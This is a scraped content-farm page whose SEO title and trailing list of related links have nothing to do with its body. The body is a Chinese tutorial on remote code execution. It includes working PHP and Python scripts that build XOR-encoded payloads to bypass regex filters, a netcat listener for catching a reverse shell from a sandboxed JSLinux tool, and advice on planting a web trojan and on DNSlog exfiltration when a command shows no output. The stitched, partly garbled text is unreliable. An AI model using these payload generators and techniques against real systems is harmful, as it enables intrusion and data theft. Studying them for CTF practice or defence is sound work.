当前位置: 首页 > news >正文

长沙网站seo服务wordpress列表分页代码

长沙网站seo服务,wordpress列表分页代码,照明公司网站制作,模板背景图片前言 了解了漏洞的原理之后就需要知道 他在哪能出现 并且被利用 这个还是很重要的 异或测试 使用异或(XOR)运算进行加密解密的原理_异或加密-CSDN博客 异或测试是在 白盒内执行的 一个例题看一下 输入什么都是会报错 这种情况就需要使用 异或计…

前言

了解了漏洞的原理之后就需要知道  他在哪能出现  并且被利用  这个还是很重要的

异或测试

使用异或(XOR)运算进行加密解密的原理_异或加密-CSDN博客

异或测试是在 白盒内执行的 一个例题看一下

输入什么都是会报错

这种情况就需要使用  异或计算或者或运算进行绕过 脚本:

<?php
$myfile = fopen("res.txt", "w");
$contents="";
for ($i=0; $i < 256; $i++) {for ($j=0; $j <256 ; $j++) {if($i<16){$hex_i='0'.dechex($i);}else{$hex_i=dechex($i);}if($j<16){$hex_j='0'.dechex($j);}else{$hex_j=dechex($j);}$preg = '/[a-z0-9]/i'; //根据题目给的正则表达式修改即可if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){echo "";}else{$a='%'.$hex_i;$b='%'.$hex_j;$c=(urldecode($a)^urldecode($b));if (ord($c)>=32&ord($c)<=126) {$contents=$contents.$c." ".$a." ".$b."\n";}}}
}
fwrite($myfile,$contents);
fclose($myfile);

运行之后会生成一个 文件

import requests
import urllib
from sys import *
import osdef action(arg):s1 = ""s2 = ""for i in arg:f = open("res.txt", "r")while True:t = f.readline()if t == "":breakif t[0] == i:# print(i)s1 += t[2:5]s2 += t[6:9]breakf.close()output = "(\"" + s1 + "\"^\"" + s2 + "\")"return (output)while True:param = action(input("\n[+] your function:")) + action(input("[+] your command:")) + ";"print(param)

之后运行这个 就会出现询问

把上边这个异或计算的值拿出来直接 放到参数里

就能执行命令了

黑盒测试

RCE的黑盒出现在哪里啊?记住原理用户的输入别当做恶意代码执行   找有输入的地方但是 有输入怎么可能让你调用这个呀    那不就是相关的工具嘛  找一下(一般这类工具都是在沙盒里的)

JSLinux                       

可以查看相关的配置文件   这些配置文件就是它本身的 

弹个shell试一下  构造shell

[~]#棱角 ::Edge.Forum*

本地服务器监听  nc -lvvp 66   不就可以拿到shell了呀  但是一般的这个linux工具给你使用都会给这个命令禁   或者直接把命令文件删除

无回显问题

1、命令执行写的 网站服务器的其他的文本下边

2、带外

演示:    shell_exec 需要输出才能回显数据

1、

写个文件

写个木马 访问连接上去不就又是一个思路了嘛

2、带外

使用DNSlog  

获取ip

数据带外 (因为我只是localhost 是带不出来的 如果想带外就需要自己搭建个本地网站)

http://www.yayakq.cn/news/829573/

相关文章:

  • 网站开发外贸客户判断网站到期
  • 管理有限公司网站设计网页设计与网站建设课程
  • 网站建站中关键字搜索怎么弄哪个网站ppt模板免费下载
  • 有名的网站制作公司做阿里巴巴类似的网站吗
  • 小网站关键词搜什么wordpress导航标签文件在哪
  • 如何快速提升网站权重wordpress博客模板下载
  • 罗湖网站开发秘密入口3秒自动进入
  • 网站打不开 ...深圳公司网站建设设计
  • 免费自动建站站长工具是做什么的
  • 郑州做网站推广电话易优cms收费吗
  • 辛集市建设局网站商城建站流程
  • .net 网站 语言新公司起名大全集
  • 济南网站制作培训班工业设计就业前景
  • 做旅游网站需要引进哪些技术人才建设科技处网站
  • 衡水龙华的网站建设智能家居网站模板
  • 建站服务公司网站源码网站开发的名称叫什么
  • 网站开发属于哪个部门做第三方支付网站违法吗
  • 营销型企业网站分析与诊断上海有哪些网络公司
  • 做一个自己的app要多少钱网站优化要怎么做才会做到最佳
  • 北京朝阳区建设工作办公网站网站建设架构 服务器
  • 找人做网站需要注意问题关于建立企业网站的方案内容
  • 河南响应式建站logo制作步骤
  • 网页设计与网站建设+pdf有没有什么需要推广的平台
  • 广东融都建设有限公司 公司网站品牌vi形象设计公司
  • 炒币做合约哪个网站最好网站导航栏设计步骤
  • 广州地铁站路线图外汇返佣网站建设
  • 北京市建设厅门户网站北京网站建设华网天下科技
  • 适合新手做网站的网站的关键词在哪里设置
  • php网站开发实用技术国际贸易平台有哪些
  • 平面设计如何接单seo助手